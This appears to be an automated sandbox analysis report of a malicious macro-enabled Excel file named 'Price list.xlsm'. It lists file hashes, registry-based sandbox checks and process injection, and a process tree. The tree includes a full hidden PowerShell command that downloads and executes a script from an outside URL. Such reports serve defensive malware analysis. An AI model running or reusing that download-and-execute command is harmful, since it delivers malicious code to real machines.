Analysis

- max time kernel: 123s
- max time network: 152s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 04-05-2021 15:01

Static task: static1
Behavioral task: behavioral1
Sample: Price list.xlsm
Resource: win7v20210410
General

- Target: Price list.xlsm
- Size: 64KB
- MD5: dc48640ca8488d4c4e61b807ef19d11c
- SHA1: e2cfbc565e62b269a7bfbdf2b3c060e52aaa6614
- SHA256: c8f3d97c54386b86778a1d20917353583bcf706ffe0615d962683d55e449bcab
- SHA512: 06d0b3420f784cad69e11202271b99f47c7c5eeca68de9a5e01da6ebf2c5b25414ec242dd4517eeff43fcd239ec8ded073a9317c1140ae9e3c6b620b6af741b9

Malware Config

- Extracted: https://cenga.hr/components/search/pri.ps1
Signatures

- Blocklisted process makes network request (1 IoC)
  Processes (flow, pid, process):
  40, 416, powershell.exe
- Downloads MZ/PE file
- Executes dropped EXE (1 IoC)
  Processes (pid, process):
  3980, HsJzA.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes (description, ioc, process):
  Key opened, \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0, EXCEL.EXE
  Key value queried, \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz, EXCEL.EXE
  Key value queried, \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString, EXCEL.EXE
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes (description, ioc, process):
  Key value queried, \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU, EXCEL.EXE
  Key opened, \REGISTRY\MACHINE\Hardware\Description\System\BIOS, EXCEL.EXE
  Key value queried, \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily, EXCEL.EXE
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes (pid, process):
  852, EXCEL.EXE
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes (pid, process):
  3980, HsJzA.exe
  3980, HsJzA.exe
  416, powershell.exe
  416, powershell.exe
  416, powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes (description, pid, process):
  Token: SeDebugPrivilege, 3980, HsJzA.exe
  Token: SeDebugPrivilege, 416, powershell.exe
- Suspicious use of SetWindowsHookEx (12 IoCs)
  Processes (pid, process):
  852, EXCEL.EXE (12 identical entries)
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes (description, pid, process, target process):
  PID 852 wrote to memory of 3980, 852, EXCEL.EXE, HsJzA.exe
  PID 852 wrote to memory of 3980, 852, EXCEL.EXE, HsJzA.exe
  PID 3980 wrote to memory of 2208, 3980, HsJzA.exe, cmd.exe
  PID 3980 wrote to memory of 2208, 3980, HsJzA.exe, cmd.exe
  PID 2208 wrote to memory of 416, 2208, cmd.exe, powershell.exe
  PID 2208 wrote to memory of 416, 2208, cmd.exe, powershell.exe
Processes (process tree; the number is the depth in the tree)

1. C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
   Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Price list.xlsm"
   - Checks processor information in registry
   - Enumerates system info in registry
   - Suspicious behavior: AddClipboardFormatListener
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory
   2. C:\Users\Admin\AppData\Local\Temp\HsJzA.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\HsJzA.exe
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      3. C:\Windows\SYSTEM32\cmd.exe
         Command line: "cmd"
         - Suspicious use of WriteProcessMemory
         4. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('https://cenga.hr/components/search/pri.ps1'))"
            - Blocklisted process makes network request
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
Downloads

- C:\Users\Admin\AppData\Local\Temp\HsJzA.exe
  MD5: c8f1a39398783633b0fdcf9c744001ee
  SHA1: db1ac98baa818def3931ccce9bd63434cf81587d
  SHA256: d506b695f45cb729a6af2e18708597fe2f7df623d4f36e1ab1a4f118dbbdccf9
  SHA512: d4d3c235e7224de8378b21b43f713df904903c7c01fda8ba4110469c8f9e766ea44b0ffda8ea47ec97fbc383db51f969e0fcfed7d0e0de194b891b928855c60b